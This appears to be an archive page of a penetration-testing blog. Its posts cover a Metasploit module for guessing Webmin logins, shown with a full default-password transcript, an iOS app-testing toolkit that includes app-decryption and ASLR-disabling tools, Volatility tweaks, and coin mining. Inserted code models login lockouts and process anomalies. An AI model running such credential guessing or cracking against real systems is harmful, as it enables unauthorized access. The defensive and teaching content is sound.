just sticking this here so i can find it later. thanks @mubix
cat hosts.txt | xargs -t -I subdomain dig +noall subdomain.THEDOMAIN.com +answer
update, rob pointed me to his post on it
carnal0wnage [Shared Reader]
Tuesday, March 25, 2014
Wednesday, March 12, 2014
So I ran across a bunch of Webmin boxes on a pentest. I went to just go try http_login or some other spiffy Metasploit auxiliary module, but nothing was working quite right. I ended up needing to write my own because I had about 60+ hosts to check, and that's just tedious enough to make you write code rather than do it manually.
At least one gotcha I discovered is that Webmin will block the IP after four or five (usually 5) attempts. I believe the default block is 300 seconds; it will also supposedly increase the delay if the same host keeps hitting it.
I took the approach of throwing 5 passwords at it; if it's not something super obvious then I'd move along. Maybe not the best solution, but I wanted to make sure it wasn't root/root or webmin/webmin and move on.
msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
msf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt
PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run
[*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi
[*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)
[*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi
** Note: you have to unset the PASSWORD value too; for some reason it's populating with a blank password and trying that, which sucks if you only have five chances.
Code is here
Figured I'd let the blog serve as a way to let people test prior to doing a pull request.
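The lockout behaviour the post runs into (a handful of failed logins from one source, then 403s for a while, with the block getting longer if the host keeps hitting it) is worth understanding from the server side, since it is the control that makes "five guesses and move on" the only sane approach. Below is an added illustration of such a per-source lockout, written for this page; it is not Webmin's code and not the Metasploit module from the post. The numbers (4 failures before the next attempt is refused, a 300 second block, doubling on each hit while blocked) are assumptions taken from the post's description of Webmin's behaviour, not verified defaults, and the sample attempt sequence is constructed to mirror the transcript above.

```python
"""Per-source login lockout model (illustration only; not Webmin or Metasploit code)."""
import time

MAX_FAILURES = 4       # consecutive failures before the next attempt is refused (assumed)
BASE_BLOCK_SECS = 300  # initial block length; the post says the default is 300 s (assumed)
BLOCK_GROWTH = 2       # multiplier applied each time a blocked host keeps hitting (assumed)


class LoginLockout:
    """Tracks failed logins per source IP and refuses attempts while a source is blocked."""

    def __init__(self, now=time.time):
        self._now = now              # injectable clock so the model can be replayed offline
        self._failures = {}          # ip -> consecutive failed attempts since last success/block
        self._blocked_until = {}     # ip -> clock value at which the block expires
        self._block_len = {}         # ip -> current block length for that ip (grows on repeat hits)

    def is_blocked(self, ip):
        until = self._blocked_until.get(ip)
        return until is not None and self._now() < until

    def remaining_block(self, ip):
        """Seconds left on the block for `ip`, or 0 if it is not blocked."""
        if not self.is_blocked(ip):
            return 0
        return self._blocked_until[ip] - self._now()

    def record_attempt(self, ip, success):
        """Return 'ok', 'fail' or 'blocked' for one authentication attempt from `ip`."""
        now = self._now()
        if self.is_blocked(ip):
            # Hitting the server while blocked extends the block: the 6th attempt in the
            # post's transcript would push the window out further, not shorten it.
            self._block_len[ip] *= BLOCK_GROWTH
            self._blocked_until[ip] = now + self._block_len[ip]
            return "blocked"
        if success:
            self._failures.pop(ip, None)
            self._block_len.pop(ip, None)
            return "ok"
        self._failures[ip] = self._failures.get(ip, 0) + 1
        if self._failures[ip] >= MAX_FAILURES:
            # This attempt was genuinely checked and failed; everything after it is refused.
            length = self._block_len.get(ip, BASE_BLOCK_SECS)
            self._block_len[ip] = length
            self._blocked_until[ip] = now + length
            self._failures[ip] = 0
        return "fail"


def replay(attempts):
    """Replay (seconds_offset, ip, success) tuples against a fresh tracker using a fake
    clock and return the outcome of each attempt."""
    clock = [0]
    tracker = LoginLockout(now=lambda: clock[0])
    results = []
    for offset, ip, ok in attempts:
        clock[0] = offset
        results.append(tracker.record_attempt(ip, ok))
    return results


# Constructed sample: six wrong passwords from one source a second apart (the shape of
# the post's transcript), then one more attempt long after the block has lapsed.
SAMPLE = [(i, "192.168.1.1", False) for i in range(6)] + [(2000, "192.168.1.1", False)]

if __name__ == "__main__":
    for (offset, ip, _), outcome in zip(SAMPLE, replay(SAMPLE)):
        print(f"t={offset:>5}s {ip} -> {outcome}")
```

Replaying the sample gives four `fail` results, two `blocked` results for attempts 5 and 6 (the same pattern as the 403s in the transcript), and a fresh `fail` once the window has expired. The two attempts made while blocked double the block length each time, which is the "increase the delay if the same host keeps hitting it" effect the post mentions and the reason a scanner that ignores the 403 only makes its own wait longer.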
Posted by CG at 8:00 AM
Thursday, February 20, 2014
Colin and I were working on a memory image the other day and needed to find DLLs loaded by svchost.exe. We turned to everyone's default memory analysis tool, Volatility. Volatility doesn't really give you a good option to search for loaded DLLs by process name. You can specify a pid to do this, but when you have many processes that have the same name (i.e. svchost.exe) you can end up with a nasty command like this to do the trick.
This really wasn't working for us, so we took a look at Volatility's source code and made some small adjustments. We modified the taskmods.py module, which ultimately affects the dlllist module. Normally if you run the dlllist plugin with the -h option it gives you various options you can use, such as an offset or a pid, as seen below:
Now we can simply give it the svchost.exe process by name and get a list of loaded DLLs for every process running under that name. If you have a non-standard svchost.exe process running then this will pick it up as well, but that situation might also help identify a compromise :)
So executing Volatility with the following command:
vol.py -f 7re-912d4ad7.vmem --profile Win7SP1x64 dlllist -n svchost.exe
now gives an output of:
To install it, just replace the taskmods.py in your $VOLATILITYHOME/volatility/plugins directory with our taskmods.py.
We have tested it on Volatility 2.2, 2.3, and 2.3.1 on XP and Windows 7 with no problems.
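The core of the change described above is a name filter over the task list instead of a pid filter, and once you have every svchost.exe in one place the interesting question is which instance differs from its siblings. The following is an added illustration of that idea written for this page; it is not the modified taskmods.py and does not use Volatility at all. It works on plain Python objects shaped like the _EPROCESS fields Volatility exposes (UniqueProcessId, InheritedFromUniqueProcessId, ImageFileName) plus a constructed dlls list, and it goes one step beyond the post by also flagging same-named processes with an unexpected parent, which is a hypothetical extension rather than part of the authors' plugin. The sample task list is constructed, not taken from a real image.

```python
"""Name-based task filtering and DLL comparison (illustration; not Volatility code)."""
from collections import namedtuple

# Constructed stand-in for Volatility task objects; field names mirror _EPROCESS.
Task = namedtuple("Task", "UniqueProcessId InheritedFromUniqueProcessId ImageFileName dlls")

SAMPLE_TASKS = [  # constructed sample, not a real memory image
    Task(4, 0, "System", []),
    Task(480, 4, "services.exe", ["ntdll.dll", "kernel32.dll"]),
    Task(612, 480, "svchost.exe", ["ntdll.dll", "kernel32.dll", "rpcrt4.dll"]),
    Task(700, 480, "svchost.exe", ["ntdll.dll", "kernel32.dll", "rpcrt4.dll", "winhttp.dll"]),
    Task(1044, 480, "SVCHOST.EXE", ["ntdll.dll", "kernel32.dll", "rpcrt4.dll"]),
    Task(1800, 480, "explorer.exe", ["ntdll.dll", "shell32.dll"]),
    Task(2120, 1800, "svchost.exe", ["ntdll.dll", "kernel32.dll", "evil.dll"]),
]


def filter_tasks_by_name(tasks, name):
    """Every task whose image name matches `name`, case-insensitively.

    _EPROCESS.ImageFileName holds at most 15 characters, so the comparison is done
    on that prefix, the same way the kernel stores it."""
    wanted = name.lower()[:15]
    return [t for t in tasks if str(t.ImageFileName).lower()[:15] == wanted]


def dlls_by_pid(tasks, name):
    """pid -> sorted DLL list for each process matching `name` (what dlllist -n would walk)."""
    return {t.UniqueProcessId: sorted(t.dlls) for t in filter_tasks_by_name(tasks, name)}


def unusual_dlls(tasks, name):
    """pid -> DLLs loaded by exactly one of the same-named processes.

    With a dozen svchost.exe instances this is a quick way to spot the odd one out
    without reading every module list by hand."""
    matches = filter_tasks_by_name(tasks, name)
    loaded = {t.UniqueProcessId: {d.lower() for d in t.dlls} for t in matches}
    counts = {}
    for mods in loaded.values():
        for d in mods:
            counts[d] = counts.get(d, 0) + 1
    return {pid: sorted(d for d in mods if counts[d] == 1) for pid, mods in loaded.items()}


def unexpected_parents(tasks, name, expected_parent_name):
    """(pid, parent image name) for matching processes whose parent is not the expected one.

    Hypothetical extension of the post's idea: svchost.exe is normally spawned by
    services.exe, so an instance with a different parent deserves a look."""
    by_pid = {t.UniqueProcessId: t for t in tasks}
    out = []
    for t in filter_tasks_by_name(tasks, name):
        parent = by_pid.get(t.InheritedFromUniqueProcessId)
        pname = str(parent.ImageFileName).lower() if parent else None
        if pname != expected_parent_name.lower():
            out.append((t.UniqueProcessId, pname))
    return out


if __name__ == "__main__":
    for pid, mods in dlls_by_pid(SAMPLE_TASKS, "svchost.exe").items():
        print(f"svchost.exe pid {pid}: {', '.join(mods)}")
    print("only-loaded-here:", unusual_dlls(SAMPLE_TASKS, "svchost.exe"))
    print("odd parents:", unexpected_parents(SAMPLE_TASKS, "svchost.exe", "services.exe"))
```

On the constructed sample the name filter picks up all four svchost.exe instances, including the one whose name is stored in upper case; the DLL comparison singles out pid 700 (winhttp.dll) and pid 2120 (evil.dll) as the only processes loading those modules, and the parent check flags pid 2120 for having been started by explorer.exe rather than services.exe.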
Posted by gideon at 10:37 AM
Thursday, January 2, 2014
Well, maybe not gold... but Litecoins, Hobonickels, Dogecoins, and other kinds of *coins*.
We've all heard about Bitcoins (BTC) and all wish we had bought a few hundred 2 years ago so we could retire today, but who knew...
Well, it's too late to get in the Bitcoin game due to the difficulty of mining one being super high, but thankfully 60+ alternate cryptocurrencies have sprung up, and thanks to sites like www.cryptsy.com you can now trade those alternate currencies for BTC.
Want to know what to mine? You can check out http://www.coinwarz.com/cryptocurrency or http://www.coinarmy.com/
Punch in the numbers for your SHA256/scrypt cracking ability and get an idea of what to mine to make the most $$$ the fastest. So if you can do 300 KH/s (average cheap GPU),
in 166 days you can make one Bitcoin (BTC) mining Netcoins and exchanging them at the current rate, whereas it would take more like 2000 days to mine a Bitcoin directly.
OMG, it's raining money! Sort of.
Anyway, it's neat. Seems like a good reason to build a hash cracker, write it off for security stuff, and have it mining when it's not busy converting hashes into plaintext.
Couple articles on it:
Solo Mining vs Pools
Hardware comparison to get an idea what numbers to put into those crunchers.
You can even buy a 6 graphic card motherboard for mining, stock trading or making everyone (well your geek homies) jealous
From a hacker shit perspective... I can't imagine the mining pool software is very good. It's probably worth taking a look at it. :-)
Saturday, December 28, 2013
Now that you have your shiny new Evasion7 jailbreak running it's time to set up the environment for application testing!
Arming your iDevice with *nix tools
Take this list and dump it to a file (packages.txt) and run:
Tunnel ports over USB (enable SSH without network using localhost:2222)
Library. Custom implementation of iTunes-type connections, file-system access, system access.
Monitor realtime iOS file system
Audits data protection of files
Read cookies.binarycookies files
lsof ARM Binary
list of all open files and the processes that opened them
lsock ARM Binary
monitor socket connections
Disables ASLR of an application
Application Cracker compiled (remove encryption)
Application Cracker (BASH GDB Wrapper)
Then you just have to MitM the web traffic. There are plenty of guides on that around the net.
If you have other tools you use in your app assessment setup we'd love to hear about it. Feel free to leave suggestions in the comments.
Posted by Jhaddix at 2:57 AM
Thursday, December 26, 2013
I've been here... work has kept me super busy... pretty sure there is a post in 2012 that says about the same. :-/
I attempted to recruit some smart people to make some posts and they did, so thanks to all the guest bloggers this year.
So what's been up?
Well, I've taken on two hobbies that don't directly tie into this blog. One, Christmas lights, like the obnoxious programmable RGB color ones. Facebook friends have been kept abreast of the situation. Two, stock trading... which I found out a fair number of hackers are into... which is cool. The stock stuff came about from reading the Rich Dad Poor Dad book and trying to figure out a way not to have to work until I die. See that post for a tiny bit more explanation.
I've been told by a few people that readers would probably find the Xmas light stuff interesting, as it does involve Cat-5 cables and packets over Ethernet frames. So I'll start knowledge dumping in Jan on that topic.
Anyway. Tech stuff... what's up?
Shitty passwords are what's up this year (totally new issue, right??!!!). I didn't go back and count, but a large majority of the tests I performed or assisted with this year where there was some sort of single-factor login portal (SSL VPN, Citrix, OWA, etc.) fell over to one of the following:
Lares continues to break into hard to break into places using Red Teaming.
I also gave a talk at a credit union conference a few months ago where I tried to sum up how organizations are getting owned. TL;DR: it's all stuff we know about, but it takes work to fix, so not that many organizations do it.
I've been kind of a deadbeat on talking in 2013, but I have a few ideas for some talks for 2014; ideally blog posts either here or on the Lares blog will help me work those ideas into posts and eventually into a slide deck (or decks).
Monday, December 23, 2013
So, first of a few end-of-year posts...
Best non-technical book I read this year was Rich Dad Poor Dad.
Assets make you money, liabilities cost you money. To build wealth you need to accumulate assets.